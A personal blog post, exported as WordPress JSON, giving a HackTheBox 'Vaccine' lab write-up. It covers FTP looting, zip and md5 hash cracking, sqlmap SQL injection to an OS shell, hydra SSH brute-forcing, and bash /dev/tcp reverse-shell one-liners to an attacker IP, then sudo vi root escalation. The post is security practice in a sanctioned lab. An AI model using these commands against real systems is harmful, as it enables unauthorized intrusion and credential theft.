{"id":94,"date":"2022-08-23T22:56:22","date_gmt":"2022-08-24T02:56:22","guid":{"rendered":"https:\/\/mikebabineau.me\/?p=94"},"modified":"2022-08-25T16:34:12","modified_gmt":"2022-08-25T20:34:12","slug":"htb-starting-point-2-3-vaccine-writeup","status":"publish","type":"post","link":"https:\/\/mikebabineau.me\/index.php\/2022\/08\/23\/htb-starting-point-2-3-vaccine-writeup\/","title":{"rendered":"HTB Starting Point 2-3 “Vaccine” Writeup"},"content":{"rendered":"

This is my writeup for the ‘Vaccine’ machine in HackTheBox’s starting point. As usual, I will include everything I tried, whether it turned out to be fruitful or not.<\/p>\n

\n

Enumeration & Starting out<\/h2>\n

Let’s start with some port enumeration. We also want to save the output for future reference and posterity:<\/p>\n

nmap -sV -O -sC 10.129.60.52 | tee nmap.txt<\/code>
\nThis time we will use the tee<\/code> command rather than ><\/code> as this will display the output in STDOUT, meaning we can view the results in the console right away while simultaneously saving it to a file.<\/em><\/p>\n

We see three ports to work with, 21<\/code> (ftp), 22<\/code> (ssh), and 80<\/code> (http). Because we told nmap to run some basic scripts with -sC<\/code>, we get some additional info for these ports:
\n21<\/code>: Looks like logging in with the anonymous<\/code> user is enabled:
\ntp-anon: Anonymous FTP login allowed (FTP code 230)<\/code>
\n22<\/code>: Some hostkeys were obtained. We have those saved and may come back to these later.
\n80<\/code>: Looks like the server is hosting a php login page. We will look at that shortly!<\/p>\n

Let’s login to the ftp server using the anonymous<\/code> user to see what we can see.: ftp open 10.129.60.52<\/code>
\nSpecify anonymous<\/code> when prompted for a user
\nWe find only one file: backup.zip<\/code> . Let’s download it using the get<\/code> command. It will be downloaded to our open directory on our attacker machine. In my case, I have created a folder in my home dir: \/home\/kefka\/htb\/vaccine<\/code>
\nWe try to pry it open with the unzip<\/code> command, but it looks like it is password-protected. Boo!<\/p>\n

Rip & .zip<\/h2>\n

JohntheRipper has a tool for obtaining the password hash from a .zip<\/code> file: zip2john<\/code>. We output it to a text file and name it backupzip_hash.txt<\/code>. Now we can use John to try and break the hash using a wordlist:
\nNote: A simple guide for this can be found here<\/a><\/em><\/p>\n

john backupzip_hash.txt --wordlist \/usr\/share\/wordlists\/rockyou.txt<\/code><\/p>\n

Output:<\/p>\n

Warning: invalid UTF-8 seen reading \/usr\/share\/wordlists\/rockyou.txt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (PKZIP [32\/64])\nWill run 6 OpenMP threads\nProceeding with wordlist:\/usr\/share\/john\/password.lst\nPress 'q' or Ctrl-C to abort, almost any other key for status\n741852963        (backup.zip)\n1g 0:00:00:00 DONE (2022-08-10 15:34) 33.33g\/s 118200p\/s 118200c\/s 118200C\/s 123456..sss\nUse the \"--show\" option to display all of the cracked passwords reliably\nSession completed.\n<\/code><\/pre>\n
For some reason john<\/code> didn’t like rockyou.txt, but thankfully looks like it defaulted to another list and found the password anyway: 741852963<\/code>
\nNote: Proper formatting for the –wordlist parameter is --wordlist=[dir]<\/code>, hence our error<\/em><\/p>\n
Opening the archive, it looks like it contains a backup copy of the sourcecode for the website. So let’s look at the site now.<\/p>\n
Going Online<\/h2>\n
Peeking at the site, looks like a simple login page, as expected. We do have what we’re assuming is the source code for this (and the hint for our next question points us towards is) but let’s run gobuster first to see what we can see.<\/p>\n
===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.129.22.252\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirb\/common.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              php,txt,html,xml\n[+] Timeout:                 10s\n===============================================================\n2022\/08\/10 23:00:45 Starting gobuster in directory enumeration mode\n===============================================================\n\/.hta.html            (Status: 403) [Size: 278]\n\/.hta.xml             (Status: 403) [Size: 278]\n\/.hta.php             (Status: 403) [Size: 278]\n\/.hta                 (Status: 403) [Size: 278]\n\/.hta.txt             (Status: 403) [Size: 278]\n\/.htaccess            (Status: 403) [Size: 278]\n\/.htpasswd.php        (Status: 403) [Size: 278]\n\/.htpasswd.txt        (Status: 403) [Size: 278]\n\/.htaccess.php        (Status: 403) [Size: 278]\n\/.htaccess.txt        (Status: 403) [Size: 278]\n\/.htpasswd.html       (Status: 403) [Size: 278]\n\/.htaccess.html       (Status: 403) [Size: 278]\n\/.htpasswd.xml        (Status: 403) [Size: 278]\n\/.htaccess.xml        (Status: 403) [Size: 278]\n\/.htpasswd            (Status: 403) [Size: 278]\n\/dashboard.php        (Status: 302) [Size: 931] [--&gt; index.php]\n\/index.php            (Status: 200) [Size: 2312]\n\/index.php            (Status: 200) [Size: 2312]\n\/license.txt          (Status: 200) [Size: 1100]\n\/server-status        (Status: 403) [Size: 278]\n===============================================================\n2022\/08\/10 23:05:09 Finished\n===============================================================\n\n<\/code><\/pre>\n
Not much. Looks like just a few php files.
\nLooking at the contents of the index.php<\/code> file we pulled off the ftp server reveals something interesting in a function at the start of the page:<\/p>\n
session_start();\n  if(isset($_POST['username']) && isset($_POST['password'])) {\n    if($_POST['username'] === 'admin' && md5($_POST['password']) === \"2cb42f8734ea607eefed3b70af13bbd3\") {\n      $_SESSION['login'] = \"true\";\n      header(\"Location: dashboard.php\");\n<\/code><\/pre>\n
Looks like they are checking the credentials provided inside the php file itself. We have a username and an md5 hash of the password thanks to their poor practices. We will head over to www.crackstation.net and pop the hash in to complete our creds: admin:qwerty789<\/code><\/p>\n
Struggling through sqlmap<\/h2>\n
Logging into the site, we see a table with some car info in it  and a search function in the top right. The question in task 6 points us to using sqlmap<\/code> to find a vulnerability on the site using the --os-shell<\/code> switch. So we run the command: sqlmap -u http:\/\/[Target-ip]\/dashboard.php --os-shell<\/code>
\nSadly it doesn’t seem to work. sqlmap<\/code> returns something along the lines of “None of the fields are injectable”.
\nLooking online at some examples of sqlmap --os-shell<\/code> usage, it seems it is often best to call it using a local file that has a full http request in it. So we will open Burpsuite, log into the website and save the http request to a file. However, we still get the same output from sqlmap<\/code>. Further googling doesn’t give us any pointers, but eventually through trial and error we discover that we need to pass a search query in the url of the http request we pass into sqlmap<\/code>. So what was successful was entering a search and saving the GET<\/code> request contents, and then passing those into sqlmap<\/code>. So our URL should look something like
\nhttp:\/\/[server-ip]\/dashboard.php?search=123<\/code>
\nOur saved HTTP request looks like this:<\/p>\n
GET \/dashboard.php?search=123 HTTP\/1.1\nHost: 10.129.126.241\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/103.0.5060.134 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/10.129.126.241\/dashboard.php\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: PHPSESSID=il4uvu77vqqhkqae1bjoo3klve\nConnection: close\n<\/code><\/pre>\n
We will then save the contents of the request form burp to a file and passing that into sqlmap<\/code>
\nSo our successful command looks like this: sqlmap -r sqlmap_input --os-shell<\/code>
\nWe will get some prompts in the program, read through them and answer appropriately. The one we are concerned with is: GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y\/N]<\/code>
\nWe will answer N<\/code>
\nAnd we get our shell – we are in!<\/p>\n
Cracking the shell & Privilege Escalation<\/h2>\n
whoami<\/code> returns postgres<\/em> for our user. We see, however, that many commands seem to be disabled for our user, or are not able to be passed through the sqlmap<\/code> shell. cd<\/code> doesn’t work, so we can’t navigate the system to try and expand our foothold. We are able to run cat<\/code>, and we are able to output the \/etc\/passwd<\/code>  file to list the users. We see there is a simon<\/em> user, so we try running hydra<\/code> to bruteforce our way in through ssh using the following command:
\nhydra -t16 -l simon -P \/usr\/share\/wordlists\/rockyou.txt -vV 10.129.222.199 ssh<\/code>
\nNow we wait (it will be awhile). If successful, we will be able to use ssh to get a much more secure and usable shell.
\nWhile this is going on, we take a peek at the lab tasks to get an idea of what else to try. It looks like there is a program postgres<\/em> is able to run as root, so we try try running sudo -l<\/code>, although without a password it won’t be much help. In any case, it doesn’t seem to work through our sqlmap<\/code> shell anyway. As we suspected, running sudo -l -S<\/code> (the -S switch is required due to our sqlmap<\/code> context according to an error thrown when we try to run sudo-l<\/code>) prompts for a password.<\/p>\n
The sqlmap<\/code> connection keeps dropping, which is pretty annoying. It’s also severely limiting our capabilities on the victim machine. In an attempt to run a more usable and stable shell we open a netcat<\/code> listener on our attacker machine and try calling bash -i &gt;&amp; \/dev\/tcp\/{attacker_ip}\/9999 0&gt;&amp;1<\/code>, but it doesn’t seem to work. We go to our good friend Google and start combing through results, and eventually find an interesting reddit post<\/a> with a different technique of calling bash using the -c switch to take another command as a string: bash -c \"bash -i &gt;&amp; \/dev\/tcp\/[IP-address]\/443 0&gt;&amp;1\"<\/code>. Amusingly, it seems they got this command from a writeup for a different HTB machine, but we won’t worry about that. We change the port what our listening netcat<\/code> expects and we get a reverse shell going! Nice.<\/p>\n
cd<\/code> commands now work, so we start poking through the pc to see what we can see. The source code for the site seems to be a good place to start, as sqlmap<\/code> was able to log in as the  postgresql<\/code> there may be a hash of the password somewhere we can leverage.<\/p>\n
This turns out to be very close to the case. In fact, the password was stored in plaintext<\/em> at the top of the dashboard.php<\/code> file for the site:<\/p>\n
\nsession_start(); \n    if($_SESSION['login'] !== \"true\") { \n        header(\"Location: index.php\"); \n        die(); \n    } \n    try { \n        $conn = pg_connect(\"host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!\"); \n    }\n<\/code><\/pre>\n
Running sudo -l<\/code> points us to one app we can use to get to root: vi<\/code>, but there is a catch: we can only run it as root on a specified file:<\/p>\n
User postgres may run the following commands on vaccine:\n(ALL) \/bin\/vi \/etc\/postgresql\/11\/main\/pg_hba.conf\n<\/code><\/pre>\n
So we run the following command: sudo vi \/etc\/postgresql\/11\/main\/pg_hba.conf<\/code> and it opens vi<\/code> as root in that file. There is a very well-known trick (actually a built in feature) to getting a shell in vi<\/code>. If we type :<\/code>, it will open up a prompt from which we can run a shell simply by calling \/bin\/bash<\/code>. This works and we are now in a shell as root!<\/p>\n
The only task remaining is to find the flags. navigating to \/root<\/code>, we find the root.txt<\/code> file for the root flag. But there’s one more user flag we need to find. I think we were supposed to find it already, but we must have missed it. No worries, we’ll run a quick command to find it: \"user.txt\" | grep \"user.txt\"<\/code>
\nAnd we see we missed the flag in the directory for the postgres<\/code> user:
\n\/var\/lib\/postgresql\/user.txt<\/code><\/p>\n
\n
Closing Thoughts<\/h2>\n
I had a lot of trouble with sqlmap<\/code> in this box. I spent a lot of time looking through webpages and the man<\/code> page of the command trying to figure out why my --os-shell<\/code> command wasn’t working. At first I logged all the switches and things I tried, but I had to cut it down because it was just way too long<\/strong>, and I already feel like these writeups are a bit wordy. On that note, I’ll end this one!
\n~Mike ‘kefka’ Babineau<\/p>\n","protected":false},"excerpt":{"rendered":"
This is my writeup for the ‘Vaccine’ machine in HackTheBox’s starting point. As usual, I will include everything I tried, whether it turned out to be fruitful or not. Enumeration & Starting out Let’s start with some port enumeration. We also want to save the output for future reference and […]<\/p>\n","protected":false},"author":2,"featured_media":95,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[9],"tags":[10,7,6,12],"class_list":["post-94","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-htb-writeups","tag-cyber","tag-fun","tag-hackthebox-2","tag-writeup"],"aioseo_notices":[],"jetpack_featured_media_url":"https:\/\/mikebabineau.me\/wp-content\/uploads\/2022\/08\/vaccinepwned.png","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/mikebabineau.me\/index.php\/wp-json\/wp\/v2\/posts\/94","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mikebabineau.me\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mikebabineau.me\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mikebabineau.me\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/mikebabineau.me\/index.php\/wp-json\/wp\/v2\/comments?post=94"}],"version-history":[{"count":7,"href":"https:\/\/mikebabineau.me\/index.php\/wp-json\/wp\/v2\/posts\/94\/revisions"}],"predecessor-version":[{"id":118,"href":"https:\/\/mikebabineau.me\/index.php\/wp-json\/wp\/v2\/posts\/94\/revisions\/118"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mikebabineau.me\/index.php\/wp-json\/wp\/v2\/media\/95"}],"wp:attachment":[{"href":"https:\/\/mikebabineau.me\/index.php\/wp-json\/wp\/v2\/media?parent=94"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mikebabineau.me\/index.php\/wp-json\/wp\/v2\/categories?post=94"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mikebabineau.me\/index.php\/wp-json\/wp\/v2\/tags?post=94"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}